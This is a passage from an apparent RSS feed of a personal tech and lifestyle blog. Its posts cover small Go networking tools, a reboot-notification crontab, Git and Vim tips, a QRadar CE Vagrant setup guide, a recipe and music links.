  3003.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3004.    <pubDate>Thu, 21 May 2020 19:38:00 +0000</pubDate>
  3005.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3006.    <description><![CDATA[<p>While doing some maintenance on my server, I got tired of searching through the output of <code>ip addr show</code> to find the IP addresses configured on the interfaces.<br>
  3007. Thus I wrote a simple CLI tool to display the information I needed in a concise and human friendly form: <a href="https://github.com/x-way/ipaddr" title="ipaddr - human friendly list of IP addresses and network interfaces">ipaddr</a></p>
  3008. <pre>$ ipaddr
  3009. lo          127.0.0.1/8
  3010. ens5        198.51.100.160/24
  3011. tun24008    10.123.199.78/32
  3012. tun71991639 10.200.123.5/32
  3013. tun26724    10.100.100.235/32
  3014. tun3883710  10.123.111.7/32</pre>
  3015. <p>A nice side-effect of writing this in <a href="https://golang.org/" title="The Go Programming Language">Go</a> is that it works out-of-the-box also on non-Linux systems :-)</p>
  3016. ]]></description>
  3017.    <content:encoded><![CDATA[<p>While doing some maintenance on my server, I got tired of searching through the output of <code>ip addr show</code> to find the IP addresses configured on the interfaces.<br>
  3018. Thus I wrote a simple CLI tool to display the information I needed in a concise and human friendly form: <a href="https://github.com/x-way/ipaddr" title="ipaddr - human friendly list of IP addresses and network interfaces">ipaddr</a></p>
  3019. <pre>$ ipaddr
  3020. lo          127.0.0.1/8
  3021. ens5        198.51.100.160/24
  3022. tun24008    10.123.199.78/32
  3023. tun71991639 10.200.123.5/32
  3024. tun26724    10.100.100.235/32
  3025. tun3883710  10.123.111.7/32</pre>
  3026. <p>A nice side-effect of writing this in <a href="https://golang.org/" title="The Go Programming Language">Go</a> is that it works out-of-the-box also on non-Linux systems :-)</p>
  3027. ]]></content:encoded>
  3028.  </item>
  3029.  
  3030.  <item>
  3031.    <title>Poor man's reboot notification</title>
  3032.    <link>https://blog.x-way.org/Linux/2020/04/18/Poor-mans-reboot-notification.html</link>
  3033.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324275</guid>
  3034.    <dc:creator>Andreas Jaggi</dc:creator>
  3035.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3036.    <pubDate>Sat, 18 Apr 2020 15:03:00 +0000</pubDate>
  3037.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  3038.    <description><![CDATA[<p>Sometimes you need to be notified about reboots of a machine without having the luxury of a proper monitoring system.</p>
  3039. <p>The following crontab entry triggers an e-mail when the host has been rebooted in the last 5 minutes.</p>
  3040. <pre>*/5 * * * * [ $(sed -e 's/\..*//' /proc/uptime) -lt 540 ] &amp;&amp; echo "Host has been rebooted! Uptime: $(uptime)"</pre>
  3041. ]]></description>
  3042.    <content:encoded><![CDATA[<p>Sometimes you need to be notified about reboots of a machine without having the luxury of a proper monitoring system.</p>
  3043. <p>The following crontab entry triggers an e-mail when the host has been rebooted in the last 5 minutes.</p>
  3044. <pre>*/5 * * * * [ $(sed -e 's/\..*//' /proc/uptime) -lt 540 ] &amp;&amp; echo "Host has been rebooted! Uptime: $(uptime)"</pre>
  3045. ]]></content:encoded>
  3046.  </item>
  3047.  
  3048.  <item>
  3049.    <title>Cottage cheese Avocado Crostini</title>
  3050.    <link>https://blog.x-way.org/Food/2020/04/12/Cottage-cheese-Avocado-Crostini.html</link>
  3051.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324274</guid>
  3052.    <dc:creator>Andreas Jaggi</dc:creator>
  3053.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3054.    <pubDate>Sun, 12 Apr 2020 19:16:00 +0000</pubDate>
  3055.    <category domain="https://blog.x-way.org/Food">Food</category>
  3056.    <description><![CDATA[<p>Inspired by <a href="https://fooby.ch/de/rezepte/17073/avocado-ricotta-crostini" title="Avocado-Ricotta-Crostini - Rezepte | fooby.ch">this recipe</a>, I made some yummy Crostini using Cottage cheese (instead of Ricotta cheese) and Avocado with some drops of Aceto balsamico.</p>
  3057. <p><img src="https://blog.x-way.org/images/cottage_cheese_avocado_crostini.jpeg" alt="Cottage cheese Avocado Crostini" width="439" height="329"></p>
  3058. ]]></description>
  3059.    <content:encoded><![CDATA[<p>Inspired by <a href="https://fooby.ch/de/rezepte/17073/avocado-ricotta-crostini" title="Avocado-Ricotta-Crostini - Rezepte | fooby.ch">this recipe</a>, I made some yummy Crostini using Cottage cheese (instead of Ricotta cheese) and Avocado with some drops of Aceto balsamico.</p>
  3060. <p><img src="https://blog.x-way.org/images/cottage_cheese_avocado_crostini.jpeg" alt="Cottage cheese Avocado Crostini" width="439" height="329"></p>
  3061. ]]></content:encoded>
  3062.  </item>
  3063.  
  3064.  <item>
  3065.    <title>Ein Lied für Jetzt</title>
  3066.    <link>https://blog.x-way.org/Music/2020/03/28/Ein-Lied-fur-Jetzt.html</link>
  3067.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324273</guid>
  3068.    <dc:creator>Andreas Jaggi</dc:creator>
  3069.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3070.    <pubDate>Sat, 28 Mar 2020 08:53:00 +0000</pubDate>
  3071.    <category domain="https://blog.x-way.org/Music">Music</category>
  3072.    <description><![CDATA[<p><a href="https://youtu.be/t_s6waEUTbI" title="die ärzte - Ein Lied für Jetzt - YouTube">die ärzte - Ein Lied für Jetzt</a></p>
  3073. ]]></description>
  3074.    <content:encoded><![CDATA[<p><a href="https://youtu.be/t_s6waEUTbI" title="die ärzte - Ein Lied für Jetzt - YouTube">die ärzte - Ein Lied für Jetzt</a></p>
  3075. ]]></content:encoded>
  3076.  </item>
  3077.  
  3078.  <item>
  3079.    <title>ip_compact and ip_diff</title>
  3080.    <link>https://blog.x-way.org/Networking/2020/03/21/ip_compact-and-ip_diff.html</link>
  3081.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324272</guid>
  3082.    <dc:creator>Andreas Jaggi</dc:creator>
  3083.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3084.    <pubDate>Sat, 21 Mar 2020 15:18:00 +0000</pubDate>
  3085.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3086.    <description><![CDATA[<p>Somehow I always end up working with lists of IP networks and needing to minimize and compare them.</p>
  3087. <p>Some of my Perl scripts for this might still be hidden in a corporate source repository, and somewhere in the backups of my old Linux laptop should be even earlier attempts in Bash.</p>
  3088. <p>Both of them are not very useful to me where they are, thus I've written yet another version.<br>This time in Go using the <a href="https://github.com/mikioh/ipaddr" title="package ipaddr">ipaddr</a> package.</p>
  3089. <p>Say hello to <a href="https://github.com/x-way/ip_compact" title="ip_compact - Compact a list of IP prefixes">ip_compact</a> and <a href="https://github.com/x-way/ip_diff" title="ip_diff - Compare two lists of IP prefixes">ip_diff</a> :-)</p>
  3090. ]]></description>
  3091.    <content:encoded><![CDATA[<p>Somehow I always end up working with lists of IP networks and needing to minimize and compare them.</p>
  3092. <p>Some of my Perl scripts for this might still be hidden in a corporate source repository, and somewhere in the backups of my old Linux laptop should be even earlier attempts in Bash.</p>
  3093. <p>Both of them are not very useful to me where they are, thus I've written yet another version.<br>This time in Go using the <a href="https://github.com/mikioh/ipaddr" title="package ipaddr">ipaddr</a> package.</p>
  3094. <p>Say hello to <a href="https://github.com/x-way/ip_compact" title="ip_compact - Compact a list of IP prefixes">ip_compact</a> and <a href="https://github.com/x-way/ip_diff" title="ip_diff - Compare two lists of IP prefixes">ip_diff</a> :-)</p>
  3095. ]]></content:encoded>
  3096.  </item>
  3097.  
  3098.  <item>
  3099.    <title>#StayTheFuckHome</title>
  3100.    <link>https://blog.x-way.org/Music/2020/03/17/StayTheFuckHome.html</link>
  3101.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324271</guid>
  3102.    <dc:creator>Andreas Jaggi</dc:creator>
  3103.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3104.    <pubDate>Tue, 17 Mar 2020 19:33:00 +0000</pubDate>
  3105.    <category domain="https://blog.x-way.org/Music">Music</category>
  3106.    <description><![CDATA[<p><a href="https://youtu.be/CP70fI3BUs8" title="Bitch Queens - #StayTheFuckHome - YouTube">Bitch Queens - #StayTheFuckHome</a></p>
  3107. <p><a href="https://staythefuckhome.com/" title="Stay The Fuck Home!">Stay The Fuck Home!</a></p>
  3108. ]]></description>
  3109.    <content:encoded><![CDATA[<p><a href="https://youtu.be/CP70fI3BUs8" title="Bitch Queens - #StayTheFuckHome - YouTube">Bitch Queens - #StayTheFuckHome</a></p>
  3110. <p><a href="https://staythefuckhome.com/" title="Stay The Fuck Home!">Stay The Fuck Home!</a></p>
  3111. ]]></content:encoded>
  3112.  </item>
  3113.  
  3114.  <item>
  3115.    <title>This Page is Designed to Last</title>
  3116.    <link>https://blog.x-way.org/Misc/2019/12/20/This-Page-is-Designed-to-Last.html</link>
  3117.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324270</guid>
  3118.    <dc:creator>Andreas Jaggi</dc:creator>
  3119.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3120.    <pubDate>Fri, 20 Dec 2019 09:56:00 +0000</pubDate>
  3121.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3122.    <description><![CDATA[<p><a href="https://jeffhuang.com/designed_to_last/" title="This Page is Designed to Last: A Manifesto for Preserving Content on the Web">This Page is Designed to Last</a> &mdash; a manifesto from Jeff Huang for preserving content on the web, where he advocates to keep content on the web available and pledges to keep his site available for the next 10 years.</p>
  3123. <p>Having my content in this weblog online since 2002, I can very much relate to this initiative and additionally would like to point to the efforts of <a href="https://archive.org/">archive.org</a> (aka. The Internet Archive).<br>The wayback machine of archive.org allows to see old versions of websites, even when the website itself is no longer available.</p>
  3124. <p>For me personally this became critically useful when the database of my weblog vanished with no current backup and I then used the archived versions from archive.org to <a href="https://blog.x-way.org/Misc/2011/11/26/Online-Again.html" title="Online Again">restore the missing content</a>.</p>
  3125. <p>Thus I would like to encourage everyone to support the efforts of archive.org with a <a href="https://archive.org/donate/" title="Donate to the Internet Archive!">donation</a>.</p>
  3126. ]]></description>
  3127.    <content:encoded><![CDATA[<p><a href="https://jeffhuang.com/designed_to_last/" title="This Page is Designed to Last: A Manifesto for Preserving Content on the Web">This Page is Designed to Last</a> &mdash; a manifesto from Jeff Huang for preserving content on the web, where he advocates to keep content on the web available and pledges to keep his site available for the next 10 years.</p>
  3128. <p>Having my content in this weblog online since 2002, I can very much relate to this initiative and additionally would like to point to the efforts of <a href="https://archive.org/">archive.org</a> (aka. The Internet Archive).<br>The wayback machine of archive.org allows to see old versions of websites, even when the website itself is no longer available.</p>
  3129. <p>For me personally this became critically useful when the database of my weblog vanished with no current backup and I then used the archived versions from archive.org to <a href="https://blog.x-way.org/Misc/2011/11/26/Online-Again.html" title="Online Again">restore the missing content</a>.</p>
  3130. <p>Thus I would like to encourage everyone to support the efforts of archive.org with a <a href="https://archive.org/donate/" title="Donate to the Internet Archive!">donation</a>.</p>
  3131. ]]></content:encoded>
  3132.  </item>
  3133.  
  3134.  <item>
  3135.    <title>The Comet Is Coming</title>
  3136.    <link>https://blog.x-way.org/Music/2019/11/02/The-Comet-Is-Coming.html</link>
  3137.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324269</guid>
  3138.    <dc:creator>Andreas Jaggi</dc:creator>
  3139.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3140.    <pubDate>Sat, 02 Nov 2019 11:04:00 +0000</pubDate>
  3141.    <category domain="https://blog.x-way.org/Music">Music</category>
  3142.    <description><![CDATA[<p><a href="https://youtu.be/G55GspnNkBo" title="The Comet Is Coming - Summon The Fire - YouTube">The Comet Is Coming - Summon The Fire</a></p>
  3143. <p><a href="https://www.thecometiscoming.co.uk/" title="The Comet Is Coming">The Comet Is Coming</a> is a 21st century style Jazz band.<br>
  3144. Discovered at the <a href="https://jazznojazz.ch/" title="Zurich Jazznojazz Festival 2019">Jazznojazz</a> festival :-)</p>
  3145. ]]></description>
  3146.    <content:encoded><![CDATA[<p><a href="https://youtu.be/G55GspnNkBo" title="The Comet Is Coming - Summon The Fire - YouTube">The Comet Is Coming - Summon The Fire</a></p>
  3147. <p><a href="https://www.thecometiscoming.co.uk/" title="The Comet Is Coming">The Comet Is Coming</a> is a 21st century style Jazz band.<br>
  3148. Discovered at the <a href="https://jazznojazz.ch/" title="Zurich Jazznojazz Festival 2019">Jazznojazz</a> festival :-)</p>
  3149. ]]></content:encoded>
  3150.  </item>
  3151.  
  3152.  <item>
  3153.    <title>More productive Git</title>
  3154.    <link>https://blog.x-way.org/Coding/2019/05/25/More-productive-Git.html</link>
  3155.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324268</guid>
  3156.    <dc:creator>Andreas Jaggi</dc:creator>
  3157.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3158.    <pubDate>Sat, 25 May 2019 07:47:00 +0000</pubDate>
  3159.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  3160.    <description><![CDATA[<p><a href="https://increment.com/open-source/more-productive-git/" title="More productive Git">More productive Git</a> &mdash; a short article from <a href="https://twitter.com/kartar" title="@katar">James Turnbull</a> with 'Tips for acquiring Git super powers'.</p>
  3161. <p>TL;DR:</p>
  3162. <ul>
  3163. <li><code>git reset &lt;filename&gt;</code></li>
  3164. <li><code>git cherry-pick &lt;commitid&gt;</code></li>
  3165. <li><code>git commit --amend</code></li>
  3166. <li><code>git stash</code></li>
  3167. <li><code>git log --stat</code></li>
  3168. <li><code>git bisect</code></li>
  3169. </ul>
  3170. ]]></description>
  3171.    <content:encoded><![CDATA[<p><a href="https://increment.com/open-source/more-productive-git/" title="More productive Git">More productive Git</a> &mdash; a short article from <a href="https://twitter.com/kartar" title="@katar">James Turnbull</a> with 'Tips for acquiring Git super powers'.</p>
  3172. <p>TL;DR:</p>
  3173. <ul>
  3174. <li><code>git reset &lt;filename&gt;</code></li>
  3175. <li><code>git cherry-pick &lt;commitid&gt;</code></li>
  3176. <li><code>git commit --amend</code></li>
  3177. <li><code>git stash</code></li>
  3178. <li><code>git log --stat</code></li>
  3179. <li><code>git bisect</code></li>
  3180. </ul>
  3181. ]]></content:encoded>
  3182.  </item>
  3183.  
  3184.  <item>
  3185.    <title>Engineering Management</title>
  3186.    <link>https://blog.x-way.org/Coding/2019/01/06/Engineering-Management.html</link>
  3187.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324267</guid>
  3188.    <dc:creator>Andreas Jaggi</dc:creator>
  3189.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3190.    <pubDate>Sun, 06 Jan 2019 13:21:00 +0000</pubDate>
  3191.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  3192.    <description><![CDATA[<p><a href="https://charity.wtf/2019/01/04/engineering-management-the-pendulum-or-the-ladder/" title="Engineering Management: The Pendulum Or The Ladder">Engineering Management: The Pendulum Or The Ladder</a> &mdash; a well written article from <a href="https://charity.wtf/" title="Charity Majors">Charity Majors</a> about the non-trivial entanglement between engineering and management, explaining how doing everything at the same time does lead to unhappy/un-fulfilled people. Also worth reading in this context is the prequel article <a href="https://charity.wtf/2017/05/11/the-engineer-manager-pendulum/" title="The Engineer/Manager Pendulum">The Engineer/Manager Pendulum</a>.</p>
  3193. ]]></description>
  3194.    <content:encoded><![CDATA[<p><a href="https://charity.wtf/2019/01/04/engineering-management-the-pendulum-or-the-ladder/" title="Engineering Management: The Pendulum Or The Ladder">Engineering Management: The Pendulum Or The Ladder</a> &mdash; a well written article from <a href="https://charity.wtf/" title="Charity Majors">Charity Majors</a> about the non-trivial entanglement between engineering and management, explaining how doing everything at the same time does lead to unhappy/un-fulfilled people. Also worth reading in this context is the prequel article <a href="https://charity.wtf/2017/05/11/the-engineer-manager-pendulum/" title="The Engineer/Manager Pendulum">The Engineer/Manager Pendulum</a>.</p>
  3195. ]]></content:encoded>
  3196.  </item>
  3197.  
  3198.  <item>
  3199.    <title>Blogroll cleanup</title>
  3200.    <link>https://blog.x-way.org/Misc/2019/01/06/Blogroll-cleanup.html</link>
  3201.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324266</guid>
  3202.    <dc:creator>Andreas Jaggi</dc:creator>
  3203.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3204.    <pubDate>Sun, 06 Jan 2019 12:55:00 +0000</pubDate>
  3205.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  3206.    <description><![CDATA[<p>As some links on my blogroll start to turn into 404 errors it's time to do some cleanup and also to bring in some fresh blood :-)</p>
  3207. <p>Removed:</p>
  3208. <ul>
  3209. <li><a href="https://web.archive.org/web/20200221101248/http://www.mezzoblue.com/" title="mezzoblue">mezzoblue</a></li>
  3210. <li><a href="http://daveshea.com/blog/" title="Dave Shea">Dave Shea</a></li>
  3211. <li><a href="http://www.pepilog.de/" title="Pepilog">Pepilog</a></li>
  3212. <li><a href="https://www.elfengleich.de/" title="Elfengleich">e.loge</a></li>
  3213. <li><a href="https://web.archive.org/web/20180313151513/http://www.ende-der-vernunft.org/" title="EDV">EDV</a></li>
  3214. <li><a href="https://web.archive.org/web/20170221215450/http://sid.rstack.org/blog/" title="sid.rstack.org/blog">sid.rstack.org/blog</a></li>
  3215. <li><a href="https://web.archive.org/web/20161223004544/https://couchblog.de/codecandies/" title="Code Candies">Code Candies</a></li>
  3216. <li><a href="https://thepacketgeek.com/" title="thePacketGeek">thePacketGeek</a></li>
  3217. <li><a href="http://lovfoood.blogspot.com/" title="lovfoood">lovfoood</a></li>
  3218. </ul>
  3219. <p>Added:</p>
  3220. <ul>
  3221. <li><a href="https://charity.wtf/" title="charity.wtf">charity.wtf</a></li>
  3222. </ul>
  3223. ]]></description>
  3224.    <content:encoded><![CDATA[<p>As some links on my blogroll start to turn into 404 errors it's time to do some cleanup and also to bring in some fresh blood :-)</p>
  3225. <p>Removed:</p>
  3226. <ul>
  3227. <li><a href="https://web.archive.org/web/20200221101248/http://www.mezzoblue.com/" title="mezzoblue">mezzoblue</a></li>
  3228. <li><a href="http://daveshea.com/blog/" title="Dave Shea">Dave Shea</a></li>
  3229. <li><a href="http://www.pepilog.de/" title="Pepilog">Pepilog</a></li>
  3230. <li><a href="https://www.elfengleich.de/" title="Elfengleich">e.loge</a></li>
  3231. <li><a href="https://web.archive.org/web/20180313151513/http://www.ende-der-vernunft.org/" title="EDV">EDV</a></li>
  3232. <li><a href="https://web.archive.org/web/20170221215450/http://sid.rstack.org/blog/" title="sid.rstack.org/blog">sid.rstack.org/blog</a></li>
  3233. <li><a href="https://web.archive.org/web/20161223004544/https://couchblog.de/codecandies/" title="Code Candies">Code Candies</a></li>
  3234. <li><a href="https://thepacketgeek.com/" title="thePacketGeek">thePacketGeek</a></li>
  3235. <li><a href="http://lovfoood.blogspot.com/" title="lovfoood">lovfoood</a></li>
  3236. </ul>
  3237. <p>Added:</p>
  3238. <ul>
  3239. <li><a href="https://charity.wtf/" title="charity.wtf">charity.wtf</a></li>
  3240. </ul>
  3241. ]]></content:encoded>
  3242.  </item>
  3243.  
  3244.  <item>
  3245.    <title>New Year - New Vim Trick</title>
  3246.    <link>https://blog.x-way.org/Coding/2019/01/01/New-Year-New-Vim-Trick.html</link>
  3247.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324265</guid>
  3248.    <dc:creator>Andreas Jaggi</dc:creator>
  3249.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3250.    <pubDate>Tue, 01 Jan 2019 22:24:00 +0000</pubDate>
  3251.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  3252.    <description><![CDATA[<p>Happy 2019! I have learnt a new <a href="https://www.vim.org/" title="Vim - the ubiquitous text editor">Vim</a> trick:<br>
  3253. When searching for some pattern with <kbd>/</kbd> (eg. <kbd>/mystring</kbd>), often the next step is to perform a replacement command.
  3254. Now instead of re-typing the whole string, you can directly enter the substitution command with an emtpy search-pattern (<kbd>:%s//newstring/</kbd>), Vim then automatically re-uses the previous search pattern.
  3255. </p>
  3256. <p>(<a href="https://dev.to/jkreeftmeijer/whats-your-favorite-vim-trick-5eag" title="What's your favorite Vim trick?">via</a>)</p>
  3257. ]]></description>
  3258.    <content:encoded><![CDATA[<p>Happy 2019! I have learnt a new <a href="https://www.vim.org/" title="Vim - the ubiquitous text editor">Vim</a> trick:<br>
  3259. When searching for some pattern with <kbd>/</kbd> (eg. <kbd>/mystring</kbd>), often the next step is to perform a replacement command.
  3260. Now instead of re-typing the whole string, you can directly enter the substitution command with an emtpy search-pattern (<kbd>:%s//newstring/</kbd>), Vim then automatically re-uses the previous search pattern.
  3261. </p>
  3262. <p>(<a href="https://dev.to/jkreeftmeijer/whats-your-favorite-vim-trick-5eag" title="What's your favorite Vim trick?">via</a>)</p>
  3263. ]]></content:encoded>
  3264.  </item>
  3265.  
  3266.  <item>
  3267.    <title>The Swiss Army Knife of Hashmaps</title>
  3268.    <link>https://blog.x-way.org/Coding/2018/12/08/The-Swiss-Army-Knife-of-Hashmaps.html</link>
  3269.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324264</guid>
  3270.    <dc:creator>Andreas Jaggi</dc:creator>
  3271.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3272.    <pubDate>Sat, 08 Dec 2018 06:41:00 +0000</pubDate>
  3273.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  3274.    <description><![CDATA[<p><a href="https://blog.waffles.space/2018/12/07/deep-dive-into-hashbrown/" title="The Swiss Army Knife of Hashmaps">The Swiss Army Knife of Hashmaps</a> &mdash; a very nice article from <a href="https://blog.waffles.space/" title="Arrow of Code">Ravi Shankar</a> explaining how <a href="https://www.youtube.com/watch?v=ncHmEUmJZf4" title="Matt Kulukundis - Designing a Fast, Efficient, Cache-friendly Hash Table, Step by Step">Google's SwissTable</a> concept was implemented for Rust.</p>
  3275. ]]></description>
  3276.    <content:encoded><![CDATA[<p><a href="https://blog.waffles.space/2018/12/07/deep-dive-into-hashbrown/" title="The Swiss Army Knife of Hashmaps">The Swiss Army Knife of Hashmaps</a> &mdash; a very nice article from <a href="https://blog.waffles.space/" title="Arrow of Code">Ravi Shankar</a> explaining how <a href="https://www.youtube.com/watch?v=ncHmEUmJZf4" title="Matt Kulukundis - Designing a Fast, Efficient, Cache-friendly Hash Table, Step by Step">Google's SwissTable</a> concept was implemented for Rust.</p>
  3277. ]]></content:encoded>
  3278.  </item>
  3279.  
  3280.  <item>
  3281.    <title>Run QRadar CE on Mac OS X with Vagrant</title>
  3282.    <link>https://blog.x-way.org/Networking/2018/08/05/Run-QRadar-CE-on-Mac-OS-X-with-Vagrant.html</link>
  3283.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324263</guid>
  3284.    <dc:creator>Andreas Jaggi</dc:creator>
  3285.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3286.    <pubDate>Sun, 05 Aug 2018 13:18:00 +0000</pubDate>
  3287.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  3288.    <description><![CDATA[<p>The Vagrant file provided by IBM for running <a href="https://developer.ibm.com/qradar/ce/" title="QRadar Community Edition">QRadar Community Edition</a> on Mac OS X currently does not work properly. It fails with the following error:</p>
  3289. <pre>Failure: repodata/repomd.xml from centos-gluster38: [Errno 256] No more mirrors to try.
  3290. http://mirror.centos.org/centos/7/storage/x86_64/gluster-3.8/repodata/repomd.xml: [Errno 14] HTTP Error 404</pre>
  3291. <p>The problem is that gluster3.8 was moved out of this CentOS repository and now the download fails.
  3292. But the gluster3.8 RPMs are also provided with the QRadar CE installation ISO file.</p>
  3293. <p>Based on the workaround <a href="https://developer.ibm.com/answers/questions/447072/qradar-fails-to-install-centos-7-gluster-38/">described here</a>, I've extended the IBM provided Vagrantfile so that the RPMs are taken from the ISO file instead of the CentOS repository.
  3294. With the <a href="https://blog.x-way.org/stuff/Vagrantfile" title="QRadar CE Vagrantfile">modified Vagrantfile</a> the automatic provisioning script no longer fails.</p>
  3295.  
  3296. <p>The instructions for running QRadar CE with Vagrant now look like this:</p>
  3297. <ol><li>Download the zipfile with the original Vagrantfile and the accompanying helper files from the IBM website: <a href="https://developer.ibm.com/qradar/ce/" title="https://developer.ibm.com/qradar/ce/">https://developer.ibm.com/qradar/ce/</a></li>
  3298. <li>Create a folder and extract the zipfile:<br>
  3299. <pre>mkdir community_edition
  3300. unzip QRadarCE_Vagrantfile.20171003084145.zip -d community_edition/</pre></li>
  3301. <li>Download the modified Vagrantfile and overwrite the original one:<br>
  3302. <pre>curl -o community_edition/Vagrantfile https://blog.x-way.org/stuff/Vagrantfile</pre></li>
  3303. <li>Make sure you have the requried Vagrant plugins installed:<br>
  3304. <pre>vagrant plugin install vagrant-disksize
  3305. vagrant plugin install vagrant-reload</pre></li>
  3306. <li>Make sure you have the QRadar CE ISO file (downloaded from the IBM website) in the same folder as the Vagrantfile:<br>
  3307. <pre>cp QRadarCE.iso community_edition/</pre></li>
  3308. <li>Create the auto_install file to automatically install QRadar:<br>
  3309. <pre>touch community_edition/auto_install</pre></li>
  3310. <li>Accept the EULA by adding the corresponding setup parameter in the Vagrantfile:<br>
  3311. Edit the Vagrantfile and add the --accept-eula argument to /media/cdrom/setup --no-screen to automatically accept the EULA</li>
  3312. <li>Change into the folder and start the QRadar installation (takes about 1 hour):<br>
  3313. <pre>cd community_edition
  3314. vagrant up</pre></li></ol>
  3315. ]]></description>
  3316.    <content:encoded><![CDATA[<p>The Vagrant file provided by IBM for running <a href="https://developer.ibm.com/qradar/ce/" title="QRadar Community Edition">QRadar Community Edition</a> on Mac OS X currently does not work properly. It fails with the following error:</p>
  3317. <pre>Failure: repodata/repomd.xml from centos-gluster38: [Errno 256] No more mirrors to try.
  3318. http://mirror.centos.org/centos/7/storage/x86_64/gluster-3.8/repodata/repomd.xml: [Errno 14] HTTP Error 404</pre>
  3319. <p>The problem is that gluster3.8 was moved out of this CentOS repository and now the download fails.
  3320. But the gluster3.8 RPMs are also provided with the QRadar CE installation ISO file.</p>
  3321. <p>Based on the workaround <a href="https://developer.ibm.com/answers/questions/447072/qradar-fails-to-install-centos-7-gluster-38/">described here</a>, I've extended the IBM provided Vagrantfile so that the RPMs are taken from the ISO file instead of the CentOS repository.
  3322. With the <a href="https://blog.x-way.org/stuff/Vagrantfile" title="QRadar CE Vagrantfile">modified Vagrantfile</a> the automatic provisioning script no longer fails.</p>
  3323.  
  3324. <p>The instructions for running QRadar CE with Vagrant now look like this:</p>
  3325. <ol><li>Download the zipfile with the original Vagrantfile and the accompanying helper files from the IBM website: <a href="https://developer.ibm.com/qradar/ce/" title="https://developer.ibm.com/qradar/ce/">https://developer.ibm.com/qradar/ce/</a></li>
  3326. <li>Create a folder and extract the zipfile:<br>
  3327. <pre>mkdir community_edition
  3328. unzip QRadarCE_Vagrantfile.20171003084145.zip -d community_edition/</pre></li>
  3329. <li>Download the modified Vagrantfile and overwrite the original one:<br>
  3330. <pre>curl -o community_edition/Vagrantfile https://blog.x-way.org/stuff/Vagrantfile</pre></li>
  3331. <li>Make sure you have the requried Vagrant plugins installed:<br>
  3332. <pre>vagrant plugin install vagrant-disksize
  3333. vagrant plugin install vagrant-reload</pre></li>
  3334. <li>Make sure you have the QRadar CE ISO file (downloaded from the IBM website) in the same folder as the Vagrantfile:<br>
  3335. <pre>cp QRadarCE.iso community_edition/</pre></li>
  3336. <li>Create the auto_install file to automatically install QRadar:<br>
  3337. <pre>touch community_edition/auto_install</pre></li>
  3338. <li>Accept the EULA by adding the corresponding setup parameter in the Vagrantfile:<br>
  3339. Edit the Vagrantfile and add the --accept-eula argument to /media/cdrom/setup --no-screen to automatically accept the EULA</li>
  3340. <li>Change into the folder and start the QRadar installation (takes about 1 hour):<br>
  3341. <pre>cd community_edition
  3342. vagrant up</pre></li></ol>
  3343. ]]></content:encoded>
  3344.  </item>
  3345.  
  3346.  <item>
  3347.    <title>Raid The Arcade</title>
  3348.    <link>https://blog.x-way.org/Music/2018/07/19/Raid-The-Arcade.html</link>
  3349.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324262</guid>
  3350.    <dc:creator>Andreas Jaggi</dc:creator>
  3351.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  3352.    <pubDate>Thu, 19 Jul 2018 15:31:00 +0000</pubDate>
  3353.    <category domain="https://blog.x-way.org/Music">Music</category>
  3354.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/raid_the_arcade.jpg" alt="Raid The Arcade Mix" width="450" height="535"></p>
  3355. <p><a href="https://www.amazon.com/dp/0804137277/" title="Ernest Cline - Armada">Ernest Cline - Armada</a></p>
  3356. ]]></description>
  3357.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/raid_the_arcade.jpg" alt="Raid The Arcade Mix" width="450" height="535"></p>
  3358. <p><a href="https://www.amazon.com/dp/0804137277/" title="Ernest Cline - Armada">Ernest Cline - Armada</a></p>
  3359. ]]></content:encoded>
  3360.  </item>
  3361.  
  3362.  <item>
  3363.    <title>Benjojo</title>
  3364.    <link>https://blog.x-way.org/Misc/2018/04/14/Benjojo.html</link>
